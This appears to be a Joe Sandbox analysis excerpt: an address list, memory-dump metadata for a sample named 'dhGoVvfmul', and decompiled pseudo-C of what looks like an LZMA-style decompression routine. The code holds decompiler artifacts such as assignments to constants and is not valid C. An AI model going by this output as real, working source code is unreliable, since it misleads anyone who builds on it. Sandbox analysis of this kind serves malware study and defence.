                          0x004073d5
                          0x004073d7
                          0x004073da
                          0x004072e6
                          0x004072e6
                          0x00000000
                          0x004072e6
                          0x0040736c
                          0x00407372
                          0x00407375
                          0x00407378
                          0x0040737b
                          0x0040737e
                          0x00407381
                          0x00407384
                          0x00407387
                          0x0040738a
                          0x0040738d
                          0x004073a6
                          0x004073a9
                          0x004073ac
                          0x004073af
                          0x004073b3
                          0x004073b5
                          0x004073b5
                          0x004073b6
                          0x004073b9
                          0x0040738f
                          0x0040738f
                          0x00407397
                          0x0040739c
                          0x0040739e
                          0x004073a1
                          0x004073a1
                          0x004073bc
                          0x004073c3
                          0x00000000
                          0x004073c5
                          0x00000000
                          0x004073c5
                          0x00000000
                          0x00407061
                          0x00407064
                          0x0040709a
                          0x004071ca
                          0x004071ca
                          0x004071ca
                          0x004071ca
                          0x004071cd
                          0x004071cd
                          0x004071d0
                          0x004071d2
                          0x0040745c
                          0x00000000
                          0x0040745c
                          0x004071d8
                          0x004071db
                          0x00000000
                          0x00000000
                          0x004071e1
                          0x004071e5
                          0x004071e8
                          0x004071e8
                          0x004071e8
                          0x00000000
                          0x004071e8
                          0x00407066
                          0x00407068
                          0x0040706a
                          0x0040706c
                          0x0040706f
                          0x00407070
                          0x00407072
                          0x00407074
                          0x00407077
                          0x0040707a
                          0x00407090
                          0x00407095
                          0x004070cd
                          0x004070cd
                          0x004070d1
                          0x004070fd
                          0x004070ff
                          0x00407106
                          0x00407109
                          0x0040710c
                          0x0040710c
                          0x00407111
                          0x00407111
                          0x00407113
                          0x00407116
                          0x0040711d
                          0x00407120
                          0x0040714d
                          0x0040714d
                          0x00407150
                          0x00407153
                          0x004071c7
                          0x004071c7
                          0x004071c7
                          0x00000000
                          0x004071c7
                          0x00407155
                          0x0040715b
                          0x0040715e
                          0x00407161
                          0x00407164
                          0x00407167
                          0x0040716a
                          0x0040716d
                          0x00407170
                          0x00407173
                          0x00407176
                          0x0040718f
                          0x00407191
                          0x00407194
                          0x00407195
                          0x00407198
                          0x0040719a
                          0x0040719d
                          0x0040719f
                          0x004071a1
                          0x004071a4
                          0x004071a6
                          0x004071a9
                          0x004071ad
                          0x004071af
                          0x004071af
                          0x004071b0
                          0x004071b3
                          0x004071b6
                          0x00407178
                          0x00407178
                          0x00407180
                          0x00407185
                          0x00407187
                          0x0040718a
                          0x0040718a
                          0x004071b9
                          0x004071c0
                          0x0040714a
                          0x0040714a
                          0x0040714a
                          0x0040714a
                          0x00000000
                          0x004071c2
                          0x00000000
                          0x004071c2
                          0x004071c0
                          0x004070d3
                          0x004070d6
                          0x004070d8
                          0x004070db
                          0x004070de
                          0x004070e1
                          0x004070e3
                          0x004070e6
                          0x004070e9
                          0x004070e9
                          0x004070ec
                          0x004070ec
                          0x004070ef
                          0x004070f6
                          0x004070ca
                          0x004070ca
                          0x004070ca
                          0x004070ca
                          0x00000000
                          0x004070f8
                          0x00000000
                          0x004070f8
                          0x004070f6
                          0x0040707c
                          0x0040707f
                          0x00407081
                          0x00407084
                          0x00000000
                          0x00000000
                          0x00406de3
                          0x00406de3
                          0x00406de7
                          0x0040742c
                          0x00000000
                          0x0040742c
                          0x00406ded
                          0x00406df0
                          0x00406df3
                          0x00406df6
                          0x00406df9
                          0x00406dfc
                          0x00406dff
                          0x00406e01
                          0x00406e04
                          0x00406e07
                          0x00406e0a
                          0x00406e0c
                          0x00406e0c
                          0x00406e0c
                          0x00000000
                          0x00000000
                          0x00406f6e
                          0x00406f6e
                          0x00406f72
                          0x00407438
                          0x00000000
                          0x00407438
                          0x00406f78
                          0x00406f7b
                          0x00406f7e
                          0x00406f81
                          0x00406f83
                          0x00406f83
                          0x00406f83
                          0x00406f86
                          0x00406f89
                          0x00406f8c
                          0x00406f8f
                          0x00406f92
                          0x00406f95
                          0x00406f96
                          0x00406f98
                          0x00406f98
                          0x00406f98
                          0x00406f9b
                          0x00406f9e
                          0x00406fa1
                          0x00406fa4
                          0x00406fa4
                          0x00406fa4
                          0x00406fa7
                          0x00406fa9
                          0x00406fa9
                          0x00000000
                          0x00000000
                          0x004071eb
                          0x004071eb
                          0x004071eb
                          0x004071ef
                          0x00000000
                          0x00000000
                          0x004071f5
                          0x004071f8
                          0x004071fb
                          0x004071fe
                          0x00407200
                          0x00407200
                          0x00407200
                          0x00407203
                          0x00407206
                          0x00407209
                          0x0040720c
                          0x0040720f
                          0x00407212
                          0x00407213
                          0x00407215
                          0x00407215
                          0x00407215
                          0x00407218
                          0x0040721b
                          0x0040721e
                          0x00407221
                          0x00407224
                          0x00407228
                          0x0040722a
                          0x0040722d
                          0x00000000
                          0x0040722f
                          0x00406fac
                          0x00406fac
                          0x00000000
                          0x00406fac
                          0x0040722d
                          0x00407462
                          0x00407484
                          0x0040748a
                          0x0040748c
                          0x00407493
                          0x00000000
                          0x00000000
                          0x00406a91
                          0x00407499
                          0x00407499
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
                          • Instruction ID: 0eb50412ba17cbd686f9e43e0b7d85c943a315db4d9133bb66c32ce13943f697
                          • Opcode Fuzzy Hash: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
                          • Instruction Fuzzy Hash: E7813471E04229DBDF24CFA9C8447ADBBB0FB44305F24816ED856BB281C7786A86DF45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00406E9D() {
                          				signed int _t539;
                          				unsigned short _t540;
                          				signed int _t541;
                          				void _t542;
                          				signed int _t543;
                          				signed int _t544;
                          				signed int _t573;
                          				signed int _t576;
                          				signed int _t597;
                          				signed int* _t614;
                          				void* _t621;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					if( *(_t621 - 0x40) != 1) {
                          						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                          						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                          						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                          						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                          						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                          						_t539 =  *(_t621 - 4) + 0x664;
                          						 *(_t621 - 0x58) = _t539;
                          						goto L68;
                          					} else {
                          						 *(__ebp - 0x84) = 8;
                          						while(1) {
                          							L132:
                          							 *(_t621 - 0x54) = _t614;
                          							while(1) {
                          								L133:
                          								_t540 =  *_t614;
                          								_t597 = _t540 & 0x0000ffff;
                          								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                          								if( *(_t621 - 0xc) >= _t573) {
                          									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                          									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                          									 *(_t621 - 0x40) = 1;
                          									_t541 = _t540 - (_t540 >> 5);
                          									 *_t614 = _t541;
                          								} else {
                          									 *(_t621 - 0x10) = _t573;
                          									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                          									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                          								}
                          								if( *(_t621 - 0x10) >= 0x1000000) {
                          									goto L139;
                          								}
                          								L137:
                          								if( *(_t621 - 0x6c) == 0) {
                          									 *(_t621 - 0x88) = 5;
                          									L170:
                          									_t576 = 0x22;
                          									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                          									_t544 = 0;
                          									L172:
                          									return _t544;
                          								}
                          								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                          								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                          								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                          								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                          								L139:
                          								_t542 =  *(_t621 - 0x84);
                          								while(1) {
                          									 *(_t621 - 0x88) = _t542;
                          									while(1) {
                          										L1:
                          										_t543 =  *(_t621 - 0x88);
                          										if(_t543 > 0x1c) {
                          											break;
                          										}
                          										switch( *((intOrPtr*)(_t543 * 4 +  &M004074A1))) {
                          											case 0:
                          												if( *(_t621 - 0x6c) == 0) {
                          													goto L170;
                          												}
                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                          												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                          												_t543 =  *( *(_t621 - 0x70));
                          												if(_t543 > 0xe1) {
                          													goto L171;
                          												}
                          												_t547 = _t543 & 0x000000ff;
                          												_push(0x2d);
                          												asm("cdq");
                          												_pop(_t578);
                          												_push(9);
                          												_pop(_t579);
                          												_t617 = _t547 / _t578;
                          												_t549 = _t547 % _t578 & 0x000000ff;
                          												asm("cdq");
                          												_t612 = _t549 % _t579 & 0x000000ff;
                          												 *(_t621 - 0x3c) = _t612;
                          												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                          												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                          												_t620 = (0x300 << _t612 + _t617) + 0x736;
                          												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                          													L10:
                          													if(_t620 == 0) {
                          														L12:
                          														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                          														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                          														goto L15;
                          													} else {
                          														goto L11;
                          													}
                          													do {
                          														L11:
                          														_t620 = _t620 - 1;
                          														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                          													} while (_t620 != 0);
                          													goto L12;
                          												}
                          												if( *(_t621 - 4) != 0) {
                          													GlobalFree( *(_t621 - 4));
                          												}
                          												_t543 = GlobalAlloc(0x40, 0x600); // executed
                          												 *(_t621 - 4) = _t543;
                          												if(_t543 == 0) {
                          													goto L171;
                          												} else {
                          													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                          													goto L10;
                          												}
                          											case 1:
                          												L13:
                          												__eflags =  *(_t621 - 0x6c);
                          												if( *(_t621 - 0x6c) == 0) {
                          													 *(_t621 - 0x88) = 1;
                          													goto L170;
                          												}
                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                          												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                          												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                          												_t45 = _t621 - 0x48;
                          												 *_t45 =  *(_t621 - 0x48) + 1;
                          												__eflags =  *_t45;
                          												L15:
                          												if( *(_t621 - 0x48) < 4) {
                          													goto L13;
                          												}
                          												_t555 =  *(_t621 - 0x40);
                          												if(_t555 ==  *(_t621 - 0x74)) {
                          													L20:
                          													 *(_t621 - 0x48) = 5;
                          													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                          													goto L23;
                          												}
                          												 *(_t621 - 0x74) = _t555;
                          												if( *(_t621 - 8) != 0) {
                          													GlobalFree( *(_t621 - 8)); // executed
                          												}
                          												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                          												 *(_t621 - 8) = _t543;
                          												if(_t543 == 0) {
                          													goto L171;
                          												} else {
                          													goto L20;
                          												}
                          											case 2:
                          												L24:
                          												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                          												 *(_t621 - 0x84) = 6;
                          												 *(_t621 - 0x4c) = _t562;
                          												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                          												goto L132;
                          											case 3:
                          												L21:
                          												__eflags =  *(_t621 - 0x6c);
                          												if( *(_t621 - 0x6c) == 0) {
                          													 *(_t621 - 0x88) = 3;
                          													goto L170;
                          												}
                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                          												_t67 = _t621 - 0x70;
                          												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                          												__eflags =  *_t67;
                          												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                          												L23:
                          												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                          												if( *(_t621 - 0x48) != 0) {
                          													goto L21;
                          												}
                          												goto L24;
                          											case 4:
                          												L133:
                          												_t540 =  *_t614;
                          												_t597 = _t540 & 0x0000ffff;
                          												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                          												if( *(_t621 - 0xc) >= _t573) {
                          													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                          													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                          													 *(_t621 - 0x40) = 1;
                          													_t541 = _t540 - (_t540 >> 5);
                          													 *_t614 = _t541;
                          												} else {
                          													 *(_t621 - 0x10) = _t573;
                          													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                          													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                          												}
                          												if( *(_t621 - 0x10) >= 0x1000000) {
                          													goto L139;
                          												}
                          											case 5:
                          												goto L137;
                          											case 6:
                          												__edx = 0;
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 4);
                          													__ecx =  *(__ebp - 0x38);
                          													 *(__ebp - 0x34) = 1;
                          													 *(__ebp - 0x84) = 7;
                          													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                          													L132:
                          													 *(_t621 - 0x54) = _t614;
                          													goto L133;
                          												}
                          												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          												__esi =  *(__ebp - 0x60);
                          												__cl = 8;
                          												__cl = 8 -  *(__ebp - 0x3c);
                          												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          												__ecx =  *(__ebp - 0x3c);
                          												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          												__ecx =  *(__ebp - 4);
                          												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          												__eflags =  *(__ebp - 0x38) - 4;
                          												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          												if( *(__ebp - 0x38) >= 4) {
                          													__eflags =  *(__ebp - 0x38) - 0xa;
                          													if( *(__ebp - 0x38) >= 0xa) {
                          														_t98 = __ebp - 0x38;
                          														 *_t98 =  *(__ebp - 0x38) - 6;
                          														__eflags =  *_t98;
                          													} else {
                          														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          													}
                          												} else {
                          													 *(__ebp - 0x38) = 0;
                          												}
                          												__eflags =  *(__ebp - 0x34) - __edx;
                          												if( *(__ebp - 0x34) == __edx) {
                          													__ebx = 0;
                          													__ebx = 1;
                          													goto L61;
                          												} else {
                          													__eax =  *(__ebp - 0x14);
                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          													__eflags = __eax -  *(__ebp - 0x74);
                          													if(__eax >=  *(__ebp - 0x74)) {
                          														__eax = __eax +  *(__ebp - 0x74);
                          														__eflags = __eax;
                          													}
                          													__ecx =  *(__ebp - 8);
                          													__ebx = 0;
                          													__ebx = 1;
                          													__al =  *((intOrPtr*)(__eax + __ecx));
                          													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          													goto L41;
                          												}
                          											case 7:
                          												goto L0;
                          											case 8:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 4);
                          													__ecx =  *(__ebp - 0x38);
                          													 *(__ebp - 0x84) = 0xa;
                          													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                          												} else {
                          													__eax =  *(__ebp - 0x38);
                          													__ecx =  *(__ebp - 4);
                          													__eax =  *(__ebp - 0x38) + 0xf;
                          													 *(__ebp - 0x84) = 9;
                          													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                          												}
                          												while(1) {
                          													L132:
                          													 *(_t621 - 0x54) = _t614;
                          													goto L133;
                          												}
                          											case 9:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													goto L89;
                          												}
                          												__eflags =  *(__ebp - 0x60);
                          												if( *(__ebp - 0x60) == 0) {
                          													goto L171;
                          												}
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                          												__eflags = _t258;
                          												0 | _t258 = _t258 + _t258 + 9;
                          												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                          												goto L75;
                          											case 0xa:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 4);
                          													__ecx =  *(__ebp - 0x38);
                          													 *(__ebp - 0x84) = 0xb;
                          													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                          													while(1) {
                          														L132:
                          														 *(_t621 - 0x54) = _t614;
                          														goto L133;
                          													}
                          												}
                          												__eax =  *(__ebp - 0x28);
                          												goto L88;
                          											case 0xb:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__ecx =  *(__ebp - 0x24);
                          													__eax =  *(__ebp - 0x20);
                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          												} else {
                          													__eax =  *(__ebp - 0x24);
                          												}
                          												__ecx =  *(__ebp - 0x28);
                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          												L88:
                          												__ecx =  *(__ebp - 0x2c);
                          												 *(__ebp - 0x2c) = __eax;
                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          												L89:
                          												__eax =  *(__ebp - 4);
                          												 *(__ebp - 0x80) = 0x15;
                          												__eax =  *(__ebp - 4) + 0xa68;
                          												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                          												goto L68;
                          											case 0xc:
                          												L99:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xc;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t334 = __ebp - 0x70;
                          												 *_t334 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t334;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												__eax =  *(__ebp - 0x2c);
                          												goto L101;
                          											case 0xd:
                          												L37:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xd;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t122 = __ebp - 0x70;
                          												 *_t122 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t122;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												L39:
                          												__eax =  *(__ebp - 0x40);
                          												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          													goto L48;
                          												}
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													goto L54;
                          												}
                          												L41:
                          												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          												__ecx =  *(__ebp - 0x58);
                          												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          												 *(__ebp - 0x48) = __eax;
                          												__eax = __eax + 1;
                          												__eax = __eax << 8;
                          												__eax = __eax + __ebx;
                          												__esi =  *(__ebp - 0x58) + __eax * 2;
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edx = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													 *(__ebp - 0x40) = 1;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													__ebx = __ebx + __ebx + 1;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edx;
                          													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													goto L39;
                          												} else {
                          													goto L37;
                          												}
                          											case 0xe:
                          												L46:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xe;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t156 = __ebp - 0x70;
                          												 *_t156 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t156;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												while(1) {
                          													L48:
                          													__eflags = __ebx - 0x100;
                          													if(__ebx >= 0x100) {
                          														break;
                          													}
                          													__eax =  *(__ebp - 0x58);
                          													__edx = __ebx + __ebx;
                          													__ecx =  *(__ebp - 0x10);
                          													__esi = __edx + __eax;
                          													__ecx =  *(__ebp - 0x10) >> 0xb;
                          													__ax =  *__esi;
                          													 *(__ebp - 0x54) = __esi;
                          													__edi = __ax & 0x0000ffff;
                          													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          													__eflags =  *(__ebp - 0xc) - __ecx;
                          													if( *(__ebp - 0xc) >= __ecx) {
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          														__cx = __ax;
                          														_t170 = __edx + 1; // 0x1
                          														__ebx = _t170;
                          														__cx = __ax >> 5;
                          														__eflags = __eax;
                          														 *__esi = __ax;
                          													} else {
                          														 *(__ebp - 0x10) = __ecx;
                          														0x800 = 0x800 - __edi;
                          														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          														__ebx = __ebx + __ebx;
                          														 *__esi = __cx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													 *(__ebp - 0x44) = __ebx;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														continue;
                          													} else {
                          														goto L46;
                          													}
                          												}
                          												L54:
                          												_t173 = __ebp - 0x34;
                          												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                          												__eflags =  *_t173;
                          												goto L55;
                          											case 0xf:
                          												L58:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xf;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t203 = __ebp - 0x70;
                          												 *_t203 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t203;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												L60:
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													L55:
                          													__al =  *(__ebp - 0x44);
                          													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          													goto L56;
                          												}
                          												L61:
                          												__eax =  *(__ebp - 0x58);
                          												__edx = __ebx + __ebx;
                          												__ecx =  *(__ebp - 0x10);
                          												__esi = __edx + __eax;
                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													_t217 = __edx + 1; // 0x1
                          													__ebx = _t217;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													goto L60;
                          												} else {
                          													goto L58;
                          												}
